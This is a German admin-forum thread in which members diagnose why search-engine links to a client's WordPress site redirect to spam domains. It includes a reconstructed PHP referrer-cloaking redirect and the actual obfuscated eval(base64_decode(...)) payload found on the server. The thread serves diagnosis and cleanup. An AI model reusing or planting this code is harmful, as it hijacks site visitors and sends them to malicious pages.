tetzlaf
Goto Top

Google Links werden umgeleitet

Nein, das ist kein Rootkit - mein Ubuntu ist garantiert sauber - und dieses Phänomen betrifft auch nur eine bestimmte Adresse.

So, jetzt die Langversion.
unter www.elektro-schindler.de steckt die Website eines meiner Kunden. Wenn ich die Adresse direkt aufrufe, kommt sie auch. Verwende ich aber Google und deren Trefferliste, lande ich bei http://404.25u.com/ und soll wohl Medikamente kaufen (was zwar auch nett sein kann, aber nicht zielführend ist).
So ne richtige Idee hab ich nicht - wenn der Account einfach gehackt wäre, würde eine eventuelle Weiterleitung doch immer greifen oder?
Rätsel über Rätsel...

Content-Key: 190986

Url: https://administrator.de/contentid/190986

Printed on: April 19, 2024 at 17:04 o'clock

Member: tetzlaf
tetzlaf Sep 10, 2012, updated at Sep 11, 2012 at 14:32:40 (UTC)
Goto Top
http://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CCUQFjAA&url=http%3A%2F%2Fwww.elektro-schindler.de%2F&ei=vhZOUKGlBoXTsgbWlYGIAQ&usg=AFQjCNEPn9Fi-NqeHfASJQTmxbyhRSlE6g&sig2=IMfVvc7g0_8HsBdWbo_p2g

ist die Linkadresse bei Google...
Mitglied: 60730
60730 Sep 10, 2012 updated at 17:03:01 (UTC)
Goto Top
rätsel über rätsel

und jetzt die kurzversion....

ähh ja gut von wann ist nochmal der Google cache und war da mal was und was hast du mit dem elektrischen Schindler und der mit dem Kunden zu tun?

Fragen über Fragen
Und eine wäre du bist aber nicht zufällig mit Alfred T. verwandt?
Member: tetzlaf
tetzlaf Sep 10, 2012 at 17:14:11 (UTC)
Goto Top
der elektrische Schindler ist mein Kunde - die Seite läuft auf meinem Server und wird von mir betreut. und mit Alfred Tezlaff (so schreibt der sich nämlich) bin ich leider nicht verwandt face-wink
Member: tetzlaf
tetzlaf Sep 10, 2012 at 17:47:13 (UTC)
Goto Top
für Bing gilt das selbe...
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 updated at 18:19:29 (UTC)
Goto Top
moin,

Und?

Ich lande immer bei dem Schindler. Was war das Problem?


Mal lynx, chromium, ie, opera, etc. durchprobiert?

lks
Member: tetzlaf
tetzlaf Sep 10, 2012 at 18:22:00 (UTC)
Goto Top
Hä? ich hab zwar eben das letzte Update für Wordpress installiert - lande aber trotzdem noch nicht auf der Seite...
und Du bist echt über Google resp. Yahoo oder Bing auf die Seite gekommen?
Mitglied: 60730
60730 Sep 10, 2012 updated at 18:26:26 (UTC)
Goto Top
Salü Lockartenstanzer,

[OT]
Hast du noch Lochkarten zum Stanzen? - Ich hab noch n paar 5 1/4" Floppys würde evtl. mir dir tauschen face-wink
[/OT]
Zitat von @Lochkartenstanzer:
moin,

Und?

Ich lande immer bei dem Schindler. Was war das Problem?
  • Das uns der TO immer noch nicht mitgeteilt hat, welche Buchstabenkombination er in der Suchmaschine eingetippt und welchen Link er angeklickert hat?

Gruss
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 updated at 18:29:26 (UTC)
Goto Top
ich weiß zwar nciht, was Du machst, aber wenn ich google nach elektro Schindler suche kommen ganz viele elektro-Schindlers, darunter auch Deiner. Und mit Deinem Link oben lande ich auch auf deinem Schindler.

Hast Du es mal von einem adneren System aus versucht?

lks

PS: Du könntest auch einfach die verbindugn mitsniffen, um zu sehen, was üebr die Leitung geht.
Member: tetzlaf
tetzlaf Sep 10, 2012 at 18:29:38 (UTC)
Goto Top
ok, Eingabe: elektro schindler
Geklickt den link der optisch zu www.elektro-schindler.de zeigt
Member: schattenhacker
schattenhacker Sep 10, 2012 at 18:31:16 (UTC)
Goto Top
Hallo,

entweder ist auf dem Server eine index.htm, index.html, index.php, default oder was auch immer, was unterschiedlich aufgerufen wird. Frage, wie kommt das der Unsinn da rein.
http://www.google.de/url?sa=t&rct=j&q=www.elektro-schindler.de& ...

Gib mal Suchbegriffe ein, schindler, elektro, den Ort, trifft das alle treffer?
gribt ein eine domain mit und ohne www ?

Evtl. musst Du die Seite bei google neu anmelden, aber wenn es bei bing auch so ist.
Ich tippe eher auf einen Fehler entweder innerhalb der Seite oder auf Deinem Server. ( Os? Standort, IP richtig ? DNS Einträge fehlerhaft? )

Aber ist schon komisch.
Member: tetzlaf
tetzlaf Sep 10, 2012 at 18:31:24 (UTC)
Goto Top
genau das ist das Thema - über die url kommt mensch dahin, wo mensch hin will - zu www-elektro-schindler.de aber über die Trefferliste der Suchmaschinen kommt mensch eben zu der anderen Adresse...
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 updated at 18:34:13 (UTC)
Goto Top
Dann hast Du ein anderes google. Mein Goolge spuckt mir nur http://www.schindler-elektro.de/ aus.
Member: schattenhacker
schattenhacker Sep 10, 2012 at 18:34:40 (UTC)
Goto Top
Dann mach mal ein google adwords Konto auf und schau mal, ob das da auch verlinkt wird.
Die haben evtl. eg. unserer bettina die Algorithmen versaut.... ??
Member: schattenhacker
schattenhacker Sep 10, 2012 at 18:37:08 (UTC)
Goto Top
jetzt geht es bei mir ( Niedersachsen ) auch.
techn. Problem bei google?
Member: schattenhacker
schattenhacker Sep 10, 2012 at 18:38:50 (UTC)
Goto Top
ne, jetzt wieder nicht.
Ping mal google an.
209.85.148.98 von hier aus.
Member: tetzlaf
tetzlaf Sep 10, 2012 at 18:43:41 (UTC)
Goto Top
Zitat von @Lochkartenstanzer:
Dann hast Du ein anderes google. Mein Goolge spuckt mir nur http://www.schindler-elektro.de/ aus.

da musst Du weiter unten schauen - da kommt dann elektro-schindler face-wink
Member: Alchimedes
Alchimedes Sep 10, 2012 at 18:45:54 (UTC)
Goto Top
Hallo,

betreut nen Kunden seine Webseite und kann Tante Google nicht bedienen.... face-smile


Elektro-Schindler gehostet bei LNC-Regworld-GmbH , IP-83.125.75.107
Und 404.25u.com IP 87.120.41.199 kommt aus Bulgarien...

Hier waere dann ein Eintrag in die hostdatei ne Idee gewesen. Haette ja auch der DNS Eintrag auf dem Router sein koennen.
wg. DNS Chancer und so...


Aber hier war mit Sicherheit der Webbrowsercache schuld... wie TimoBeil schrieb... aeh.. LimboSeil...


P.S: Heinz Schubert hab ich mal persoenlich getroffen... der war ###e drauf...
als ich Ihn fragte ob er Alfred Tetzlaff ist face-smile

Schoenen Abend
Member: tetzlaf
tetzlaf Sep 10, 2012 at 18:51:30 (UTC)
Goto Top
Zitat von @Alchimedes:
Hallo,

betreut nen Kunden seine Webseite und kann Tante Google nicht bedienen.... face-smile


Elektro-Schindler gehostet bei LNC-Regworld-GmbH , IP-83.125.75.107
Und 404.25u.com IP 87.120.41.199 kommt aus Bulgarien...

Hier waere dann ein Eintrag in die hostdatei ne Idee gewesen. Haette ja auch der DNS Eintrag auf dem Router sein koennen.
wg. DNS Chancer und so...


Aber hier war mit Sicherheit der Webbrowsercache schuld... wie TimoBeil schrieb... aeh.. LimboSeil...


P.S: Heinz Schubert hab ich mal persoenlich getroffen... der war ###e drauf...
als ich Ihn fragte ob er Alfred Tetzlaff ist face-smile

Schoenen Abend

Alchimedes Du Held! face-smile
es löst zwar mein problem in keinster weise - aber wir wissen jetzt, dass die Site aus BG kommt. Was der Browsercache damit zu tun hat bleibt aber auch unklar... (hat er nämlich nicht) aber jetzt nimmt die Diskussion Fahrt auf und ich bin optimistisch, dass wir in einem Anfall von Schwarmintelligenz den richtigen Weg finden werden face-smile
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 at 18:55:41 (UTC)
Goto Top
Zitat von @tetzlaf:
> Zitat von @Lochkartenstanzer:
> ----
> Dann hast Du ein anderes google. Mein Goolge spuckt mir nur http://www.schindler-elektro.de/ aus.

da musst Du weiter unten schauen - da kommt dann elektro-schindler face-wink

http://www.elektro-schindler.de/ meinte ich natürlich. Ich habe beim copy und Paste den falschen erwischt.

lks

PS: Immer noch nichts
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 at 19:01:41 (UTC)
Goto Top
Zitat von @60730:
Salü Lockartenstanzer,

[OT]
Hast du noch Lochkarten zum Stanzen? - Ich hab noch n paar 5 1/4" Floppys würde evtl. mir dir tauschen face-wink
[/OT]

auch [OT]
Die habe ich irgendwann alle verschenkt, als ich mich aufs Stanzen von 8" und 5,25" Floppies Umschulen hab lassen, weißt ja, wegen doppelter Kapazität und so. Irgendwie ist bei der Umstellugng auf 3" und 3,5"-Floppies was schiefgelaufen. irgendwie funktionierte das bei denen nicht mehr. face-sad
[/OT]
Member: Alchimedes
Alchimedes Sep 10, 2012 at 19:16:47 (UTC)
Goto Top
Alchimedes Du Held! face-smile
es löst zwar mein problem in keinster weise - aber wir wissen jetzt, dass die Site aus BG kommt. Was der Browsercache damit
zu tun hat bleibt aber auch unklar... (hat er nämlich nicht) aber jetzt nimmt die Diskussion Fahrt auf und ich bin
optimistisch, dass wir in einem Anfall von Schwarmintelligenz den richtigen Weg finden werden face-smile

Nabend,

ich schmeiss hier tante Goggle an und kann Elektro Schindler reinhaemmern und sofort den ersten Treffer...

Aber vielleicht war das ja auch die Absicht Deines Postings....

So kommt man halt auch zum Google-Ranking... SEO Massnahmen fuer Dummies.

Gruss
Member: tetzlaf
tetzlaf Sep 10, 2012 at 19:22:22 (UTC)
Goto Top
Zitat von @Alchimedes:
> Alchimedes Du Held! face-smile
> es löst zwar mein problem in keinster weise - aber wir wissen jetzt, dass die Site aus BG kommt. Was der Browsercache
damit
> zu tun hat bleibt aber auch unklar... (hat er nämlich nicht) aber jetzt nimmt die Diskussion Fahrt auf und ich bin
> optimistisch, dass wir in einem Anfall von Schwarmintelligenz den richtigen Weg finden werden face-smile

Nabend,

ich schmeiss hier tante Goggle an und kann Elektro Schindler reinhaemmern und sofort den ersten Treffer...

Aber vielleicht war das ja auch die Absicht Deines Postings....

So kommt man halt auch zum Google-Ranking... SEO Massnahmen fuer Dummies.

Gruss

schön wärs ja (aber, das würde ich garantiert intelligenter anstellen) ich bin mir aber nicht sicher, ob Du das problem schon erfasst hast? Ich erklärs Dir aber gerne nochmal:
www.elektro-schindler.de (nicht umgekehrt oder sonst wie) ist, wenn man die Adresse in den Browser eingibt, die Site, die man finden sollte. Gibst Du jetzt elektro-schindler (auch ohne -) ein und suchst den Treffer "elektro-schindler.de" dann wirst Du feststellen, dass da zwar www.elektro-schindler.de steht - der link Dich aber ganz woanders hinführt.
Unabhängig vom cache!
und nu schmeiß mal Tante Google oder Yahoo oder Bing an... und lästere erst hinterher! face-wink
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 at 19:26:46 (UTC)
Goto Top
Zitat von @tetzlaf:
finden sollte. Gibst Du jetzt elektro-schindler (auch ohne -) ein und suchst den Treffer "elektro-schindler.de" dann
wirst Du feststellen, dass da zwar www.elektro-schindler.de steht - der link Dich aber ganz woanders hinführt.
Unabhängig vom cache!
und nu schmeiß mal Tante Google oder Yahoo oder Bing an... und lästere erst hinterher! face-wink

Dann mußt Du wirklich ein anderes Google haben. Hier kommt nur der reine Link raus.

Jetzt probier es doch mal mit einem anderen rechner noder aus einem andren Netz heraus aus. Dann sehen wir ja, ob Du auf beiden rechnern das gleiche google hast.

Ansonsten frag mal bei Bettina nach, wie man einen Streisand-Effekt erzeugt, der zu einem besseren Google-Ranking führt. face-smile

lks
Member: Pjordorf
Pjordorf Sep 10, 2012 at 19:50:11 (UTC)
Goto Top
Hallo lks,

Zitat von @Lochkartenstanzer:
Dann mußt Du wirklich ein anderes Google haben. Hier kommt nur der reine Link raus.
Nene. Im Browserfenster steht ja auch nur das schon mehrfach erwähnte http://www.elektro-schindler.de/ was ja auch das richtige ist. Bitte nur das sehen was im Browserfenster dargestellt wird. Der link von Google dazu ist aber tatsächlich falscher Elektro-Schindler link und der landet irgendwann auf die Falsche Seite.

@tetzlaf:
Du solltest dir mal genauer anschauen was in diesem SearchResultString von Google drin ist und notfalls bei Google beschwerde einlegen. das es nichts geheimnisvolles ist zeigt auch dies gefundene Änderung an Google Search Referrals

Gruß,
Peter
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 at 19:50:20 (UTC)
Goto Top
hallo,

Nachdem ich es mal bei Bing versucht habe, bin ich jetzt auch auf diese Umleitung gestoßen. Interessanterweise taucht in dem Bingergebnis folgender Text auf:

    Elektro Schindler | Wenns besser werden soll
    www.elektro-schindler.de

    Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

wobei der link korrekt zur Schindler-Seite führt.

Nachdem Du wordpress verwendest, tippe ich mal, daß Du Dir was eingefangen hast.

Mein Tip: Frisch aufsetzen udn vor allem Wordpress in die Tonne schmeißen.

lks
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012, updated at Sep 12, 2012 at 17:53:24 (UTC)
Goto Top
Zitat von @Pjordorf:
richtige ist. Bitte nur das sehen was im Browserfenster dargestellt wird. Der link von Google dazu ist aber tatsächlich
[http://www.google.de/url?sa=t&rct=j&q=elektro%20schindler&source=web&cd=7&cad=rja&ved=0CEkQFjAG&url=http%3A%2F%2Fwww.elektro-schindler.de%2F&ei=hUFOUJyVM4zItAaGzIHABw&usg=AFQjCNEPn9Fi-NqeHfASJQTmxbyhRSlE6g
falscher Elektro-Schindler link] und der landet irgendwann auf die Falsche Seite.


Du kannst hellsehen, was für ein Link mir google gibt? Alle Achtung. Ich kann schon unterscheiden, was der Browser darstellt und was ich als Link bekomme. Ein lynx --dump http://www.google.de/search?q=elektro+schindler gibt Dir das sauber raus.

Aber Du hast ein Problem mit Deinem Server. Ich würde den mal durchchecken.

lks


Nachtrag: Dein google-Link oben führt mich auch zu der korrekten Seite.

Nachtrag2: In Firefox kannst Du Dir Mit CTRL-U den Seitenquelltext anzeigen lassen und da steht bei mir eindeutig ein
... href="http://www.elektro-schindler.de/" ...

drin.
Mitglied: 60730
60730 Sep 10, 2012 at 19:59:27 (UTC)
Goto Top
Zitat von @Lochkartenstanzer:
> Zitat von @60730:
> ----
> Salü Lockartenstanzer,
>
> [OT]
> Hast du noch Lochkarten zum Stanzen? - Ich hab noch n paar 5 1/4" Floppys würde evtl. mir dir tauschen face-wink
> [/OT]

auch [OT]
Die habe ich irgendwann alle verschenkt, als ich mich aufs Stanzen von 8" und 5,25" Floppies Umschulen hab lassen,
weißt ja, wegen doppelter Kapazität und so. Irgendwie ist bei der Umstellugng auf 3" und 3,5"-Floppies was
schiefgelaufen. irgendwie funktionierte das bei denen nicht mehr. face-sad
[/OT]

[OT²]
Merde aber auch, weil mein Väterchen hat seine H0 Loks und Wagen allesamt in einem groooooosen Schrank, der ursprünglich mal für Lochkarten war und der hat bald Burzeltaach... In der Bucht gibts aber grad welche (leider von Ariola)
[/OT²]

Gruß
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 at 20:03:22 (UTC)
Goto Top
Zitat von @60730:
[OT²]
Merde aber auch, weil mein Väterchen hat seine H0 Loks und Wagen allesamt in einem groooooosen Schrank, der ursprünglich
mal für Lochkarten war und der hat bald Burzeltaach... In der Bucht gibts aber grad welche (leider von Ariola)
[/OT²]

Oh, dann schau ich mal, ob alte Kollegen, die da mal mitgestanzt haben noch welche haben. Mach dir aber keine großen Hoffnungen. Ich melde mich, falls ich was auftreiben könnte.

'nacht.

lks
Member: Alchimedes
Alchimedes Sep 10, 2012 at 20:05:32 (UTC)
Goto Top
Hallo,

stimmt.

Der fuenfte Eintrag fuehrt auf die falsche Seite.
Und die aendert sich... mal Spielcasino... mal Sexangebote...

Die Suchmaschine nennt sich butabital search hat die IP 87.120.41.199 also wie vorher festgestellt.


Ich glaub das Problem ist der Name der Webseite... da schmeisst Tante Google was durcheinander.
Es gibt elektro-schindler, elektroschindler, schindlerelektro... e.t.c.


Und ueber den Quelltext von der Webseite find ich jetzt auch nichts ungewoehnliches....aber seh ja den php code hier nicht...

Wuerde hier mal Tante Google anschreiben, vieleicht sogar als attackierende Webseite melden.. den
mit <table cellpadding="0" cellspacing="0" wird was versteckt...

Aber reine Vermutung.


Gruss
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012, updated at Sep 12, 2012 at 17:54:49 (UTC)
Goto Top
Zitat von @Alchimedes:
Wuerde hier mal Tante Google anschreiben, vieleicht sogar als attackierende Webseite melden.. den
mit <table cellpadding="0" cellspacing="0" wird was versteckt...

Nee, google udn bing liefern korrekte URLs aus: http://www.elektro-schindler.de das ist das, was ich im HTMl-Code sehe, sowohl mit lynx, als auch mit Firefox.

Wenn ich üebr Bing auf die schindlerseite komme, gibt es ein Redirekt (Ich habe jezt keinen sniffer angeworfen, ist aber auch egal).

Wenn ich direkt oder über google reinkomme, bleibe ich auf der Seite.

Wie ich schon sagte: Check Deinen Server! Wordpress ist sehr anfällig. da sind mehr Löcher drin als in einem Schweizer Käse und das Zeug ist total verbuggt.

lks
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 updated at 20:47:47 (UTC)
Goto Top
Schau mal da [Edit] und da. [/Edit]

Also noch ein letztes Mal: CHECK DEINEN SERVER.

Sorry, daß ich so laut wurde.

lks


Nachtrag:

Nein, das ist kein Rootkit - mein Ubuntu ist garantiert sauber - und dieses Phänomen betrifft auch nur eine bestimmte Adresse.

Das muß gar kein rootkit sein. Die haben Dir nur mit Worpress ein paar Skripten untergeschoben.
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012, updated at Sep 11, 2012 at 05:50:40 (UTC)
Goto Top
Übrigens:

25u ist ein dyndns-Provider (Sieht man wenn man auf http://www.25u.com/ geht). udn 404.25u.com ist einfach die 404-Seite von deren Webserver, wenn man auf eine nicht existente 25u-Adresse auflösen will.

Und nachdem Google und Bing die korrekten URLs liefern, steckt bei Dir im Wordpress irgendetwas drin, das bei passendem Referrer die Seiten umleitet.

[Rant] BTW: Wie kann man mit Wordpress Firmenimage-Seiten machen? Da ist ja so ein Murks vorprommamiert. Für Private Blogs mag das ja noch angehen aber Firmenseiten?
[/Rant]


Jetzt aber gute Nacht.

lks
Member: schattenhacker
schattenhacker Sep 10, 2012 updated at 20:43:45 (UTC)
Goto Top
hallo,

ja komisch, aber wenn Du mal eine Macke auf dem Server hattest (!) damals, vor ein paar tagen, hat google das immer noch.
Evtl. holt sich bing die Daten auch von google. bei yahoo ist es auch so.
Hast Du denn keine keywords, mit deren Hilfe man auch einen treffer landet?
Wieso findet man die Seite nur mit direkter eingabe der domain?
wenn Du z.B. kjdskdjfkjdfoiooo-1a-super-jajaj_tralala
als Suchbegriff auf der seite hättest, könntest Du schauen, ob dann auch ein komischer link kommt.
Also wenn Dein Server ok ist, dann schau mal, ob da vorhher eine Manipulation war.
Wie gesagt, Seite bei google neu anmelden, kann aber Tage dauern.
Oder schreib denen mal...

Halt uns auf dem Laufenden.

Ich hefte derweil die Floppies weiter ab
Member: schattenhacker
schattenhacker Sep 10, 2012 updated at 20:57:12 (UTC)
Goto Top
also fireball liefert grade ein korrektes Ergebnis.
Kennt jemand noch andere Suchmaschinen?
Also web.de und lycos verhalten sich normal. Evtl. ist es zeitabhängig? Wer weiss, was Du dir da eingefangen hast.
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 at 20:53:31 (UTC)
Goto Top
Zitat von @schattenhacker:
Also wenn Dein Server ok ist, dann schau mal, ob da vorhher eine Manipulation war.

Sein Server kann nicht o.k. sein. Wenn ich mir referrer bing da drauf lande, werde ich auf 25u weitergeleitet, d.h. Die Malware ist immer noch auf dem Serrver. da hilft alles Anschreiben an google nichts.


lks
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 updated at 20:58:37 (UTC)
Goto Top
Zitat von @schattenhacker:
also fireball liefert grade ein korrektes Ergebnis.
Kennt jemand noch andere Suchmaschinen?

Das Problem sind nicht die Suchmaschinen, wie ich schon sagte. Auf der Maschine steckt irgendwo ein base64-Codierstes Skript, daß so ähnlich aussieht:

$referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag)
     {
       if (stristr($referer,"yahoo") or
       stristr($referer,"bing") or
       stristr($referer,"rambler") or
       stristr($referer,"gogo") or
       stristr($referer,"live.com")or
       stristr($referer,"aport") or
       stristr($referer,"nigma") or
       stristr($referer,"webalta") or
       stristr($referer,"begun.ru") or
       stristr($referer,"stumbleupon.com") or
       stristr($referer,"bit.ly") or
       stristr($referer,"tinyurl.com") or
       preg_match("/yandex\.ru\/yandsearch\?(.*?)\
       &amp;lr\=/",$referer) or
       preg_match ("/google\.(.*?)\/url/",$referer) or
       stristr($referer,"myspace.com") or
       stristr($referer,"facebook.com") or
       stristr($referer,"aol.com"))
      {
     if (!stristr($referer,"cache") or
     !stristr($referer,"inurl"))
         {
           header("Location: http://irgendwo-bei.25u.com/"); exit();
          }
      }
   } 

lks
Member: schattenhacker
schattenhacker Sep 10, 2012 at 20:58:36 (UTC)
Goto Top
ja da hast Du recht.....
Hoffentlich ist es wordpress... dann kann er die Seite neu machen und rechnung schreiben.
Member: Lochkartenstanzer
Lochkartenstanzer Sep 10, 2012 updated at 21:03:54 (UTC)
Goto Top
Zitat von @schattenhacker:
ja da hast Du recht.....
Hoffentlich ist es wordpress... dann kann er die Seite neu machen und rechnung schreiben.

Mit Rechnung schreiben wäre ich vorsichtig. Er hostet die Seite und ist damit dafür verantwortlich, daß er für die Sicherheit sorgt. Und Wordpress würde ich mal unter "grob fahrlässig" einordnen. Am besten als Lehrgeld abschreiben und was ordentliches machen. So wie die Seite aussieht sind da statische Webseiten das geeigneste. Es muß ja nicht mit vi handgeschnitzt sein, aber wordpress ist dafür definitiv ungeeignet.

lks
Member: tetzlaf
tetzlaf Sep 11, 2012 at 09:08:19 (UTC)
Goto Top
dies:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93d3cuc3RscC40cHUuY29tLyIpOw0KZXhpdCgpOw0KfQp9DQp9DQp9DQp9"));

hab ich vielfach gefunden - interessanterweise hat das Löschen des Scripts immer nur kurzzeitig was gebracht - irgendwo im System steckt ein anderes Script, das gelöschte Einträge erneuert...
btw - das Ding kam nicht aus Bulgarien, sondern aus China von china315.com

Im Ergebnis schieße ich die Site ab und mach sie neu - geht schneller... und ist auch sicherer - Danke für Eure Hilfe! face-smile
Member: sky5000i
sky5000i Sep 11, 2012 at 10:18:00 (UTC)
Goto Top
Zitat von @tetzlaf:
der elektrische Schindler ist mein Kunde - die Seite läuft auf meinem Server und wird von mir betreut. und mit Alfred Tezlaff
(so schreibt der sich nämlich) bin ich leider nicht verwandt face-wink

Hast du schon geschaut ob die Seiten umgeschrieben wurden????
Solltest mal schauen ob der Quellcode noch so ist wie du in geschrieben hast....

Ist bei mir auch schon gewesen siehe auch meine .htaccess Frage

MfG
Sky
Member: adminst
adminst Sep 11, 2012 at 12:03:34 (UTC)
Goto Top
Hallo zusammen
Dieser DNS Anbieter wurde auch infiziert. Er leitet manche Anfragen an URLs welche den
Java Bug ausznutzen. Stellt sicher, dass ihr die aktuelle Java Version installiert habt etc....

adminst
Member: Lochkartenstanzer
Lochkartenstanzer Sep 11, 2012 at 12:56:39 (UTC)
Goto Top
Zitat von @tetzlaf:
Im Ergebnis schieße ich die Site ab und mach sie neu - geht schneller... und ist auch sicherer - Danke für Eure Hilfe!
face-smile

naja, wenigstens weißt Du's jezt. Und bitte mach Dir Gedanken wie Du solch einfache Seiten ohne fehleranfälliges PHP & Wordpress gestalten kannst. Da gehört wirklich nicht viel dazu. Die Seitenbesucher werdens Dir danken.

Denk auch dran, die Logfiles auszuwerten um ggf. ehemalige Seitenbesucher zu warnen. Da werden einige sich etwas eingefangen haben.

Und auch daran denken, den Beitrag als gelöst zu setzen.

lks
Member: Lochkartenstanzer
Lochkartenstanzer Sep 11, 2012 at 13:09:04 (UTC)
Goto Top
Webseiten prüfen? Da gibt es jetzt etwas von eco: Initiative-S: Kostenloser Website-Check für kleine Unternehmen.

Ich weiß aber nicht, ob das etwass taugt.

lks